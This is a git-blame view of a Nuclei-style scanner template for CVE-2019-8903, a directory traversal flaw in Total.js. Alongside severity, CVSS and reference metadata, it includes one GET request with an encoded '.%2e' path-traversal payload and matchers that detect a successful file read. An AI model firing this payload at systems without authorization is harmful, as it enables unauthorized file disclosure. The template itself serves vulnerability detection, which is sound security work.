2021-01-02 04:59:06 +00:00
|
|
|
id: CVE-2019-8903
|
2020-04-08 07:36:36 +00:00
|
|
|
|
|
|
|
info:
|
2021-04-18 13:00:27 +00:00
|
|
|
name: Totaljs - Unauthenticated Directory Traversal
|
2020-04-08 07:36:36 +00:00
|
|
|
author: madrobot
|
|
|
|
severity: high
|
2021-03-30 12:10:17 +00:00
|
|
|
description: index.js in Total.js Platform before 3.2.3 allows path traversal.
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-03-30 12:10:17 +00:00
|
|
|
- https://blog.certimetergroup.com/it/articolo/security/total.js-directory-traversal-cve-2019-8903
|
|
|
|
- https://github.com/totaljs/framework/commit/c37cafbf3e379a98db71c1125533d1e8d5b5aef7
|
|
|
|
- https://github.com/totaljs/framework/commit/de16238d13848149f5d1dae51f54e397a525932b
|
2021-09-10 11:26:40 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 7.5
|
2021-09-10 11:26:40 +00:00
|
|
|
cve-id: CVE-2019-8903
|
|
|
|
cwe-id: CWE-22
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: cve,cve2019,totaljs,lfi
|
2020-04-08 07:36:36 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-04-08 08:45:44 +00:00
|
|
|
- "{{BaseURL}}/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html"
|
2020-07-08 11:38:57 +00:00
|
|
|
matchers-condition: and
|
2020-04-08 07:36:36 +00:00
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
2020-05-25 07:49:06 +00:00
|
|
|
- 200
|
2020-04-08 11:17:49 +00:00
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "apache2.conf"
|
|
|
|
part: body
|